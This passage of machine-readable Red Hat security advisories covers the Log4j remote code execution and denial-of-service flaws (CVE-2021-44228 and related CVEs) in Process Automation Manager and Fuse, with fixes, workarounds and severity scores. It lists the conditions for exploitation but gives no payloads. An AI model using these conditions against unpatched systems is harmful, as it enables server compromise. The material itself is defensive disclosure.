"number": "1",
"summary": "Initial version"
},
{
"date": "2022-01-11T17:56:46+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:19:23+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHPAM 7.11.1",
"product": {
"name": "RHPAM 7.11.1",
"product_id": "RHPAM 7.11.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7.11"
}
}
}
],
"category": "product_family",
"name": "Red Hat Process Automation Manager"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"RHPAM 7.11.1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-11T17:56:46+00:00",
"details": "For on-premise installations, before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nIt is recommended to halt the server by stopping the JBoss Application Server process before installing this update; after installing the update, restart the server by starting the JBoss Application Server process.\n\nThe References section of this erratum contains a download link (you must log in to download the update).",
"product_ids": [
"RHPAM 7.11.1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0082"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"RHPAM 7.11.1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"RHPAM 7.11.1"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2022_0203
Vulnerability from csaf_redhat
Published
2022-01-20 09:26
Modified
2024-12-12 01:19
Summary
Red Hat Security Advisory: Red Hat Fuse 7.8-7.10 security update
Notes
Topic
A micro version update for Fuse 7.8, 7.9, and 7.10 is now available for Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot. The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The releases of Red Hat Fuse 7.8.2, 7.9.1 and 7.10.1 serve as a patch to Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot and includes security fixes, which are documented in the Release Notes document linked to in the References.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)
* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A micro version update for Fuse 7.8, 7.9, and 7.10 is now available for Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot. The purpose of this text-only errata is to inform you about the security issues fixed in this release.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The releases of Red Hat Fuse 7.8.2, 7.9.1 and 7.10.1 serve as a patch to Red Hat Fuse on Karaf and Red Hat Fuse on Spring Boot and includes security fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\n* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)\n\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\n* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern (CVE-2021-45105)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2022:0203",
"url": "https://access.redhat.com/errata/RHSA-2022:0203"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.08.0",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.08.0"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.09.0",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.09.0"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.10.0",
"url": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=securityPatches\u0026product=jboss.fuse\u0026version=7.10.0"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "2034067",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2034067"
},
{
"category": "external",
"summary": "2035951",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2035951"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_0203.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Fuse 7.8-7.10 security update",
"tracking": {
"current_release_date": "2024-12-12T01:19:32+00:00",
"generator": {
"date": "2024-12-12T01:19:32+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2022:0203",
"initial_release_date": "2022-01-20T09:26:34+00:00",
"revision_history": [
{
"date": "2022-01-20T09:26:34+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2022-01-20T09:26:34+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:19:32+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1",
"product": {
"name": "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1",
"product_id": "Red Hat Fuse 7.8.2, 7.9.1, 7.10.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_fuse:7"
}
}
}
],
"category": "product_family",
"name": "Red Hat JBoss Fuse"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-20T09:26:34+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse product documentation pages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications",
"product_ids": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0203"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-44832",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-28T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2035951"
}
],
"notes": [
{
"category": "description",
"text": "Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: remote code execution via JDBC Appender",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Log4j 1.x is not impacted by this vulnerability. Therefore versions of log4j shipped with Red Hat Enterprise Linux are NOT affected by this flaw.\n\nFor Elasticsearch, as shipped in OpenShift Container Platform and OpenShift Logging, access to the log4j2.properties configuration is limited only to the cluster administrators and exploitation requires cluster logging changes, what reduced the impact of this vulnerability significantly [0].\n\n[0] https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476#update-jan-6-5",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44832"
},
{
"category": "external",
"summary": "RHBZ#2035951",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2035951"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44832",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44832"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44832",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44832"
},
{
"category": "external",
"summary": "https://issues.apache.org/jira/browse/LOG4J2-3293",
"url": "https://issues.apache.org/jira/browse/LOG4J2-3293"
}
],
"release_date": "2021-12-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-20T09:26:34+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse product documentation pages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications",
"product_ids": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0203"
},
{
"category": "workaround",
"details": "As per upstream:\n- In prior releases confirm that if the JDBC Appender is being used it is not configured to use any protocol other than Java.\n- Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.",
"product_ids": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: remote code execution via JDBC Appender"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-01-20T09:26:34+00:00",
"details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nInstallation instructions are available from the Fuse product documentation pages:\n\nFuse 7.8:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.9:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications\n\nFuse 7.10:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications",
"product_ids": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:0203"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"Red Hat Fuse 7.8.2, 7.9.1, 7.10.1"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
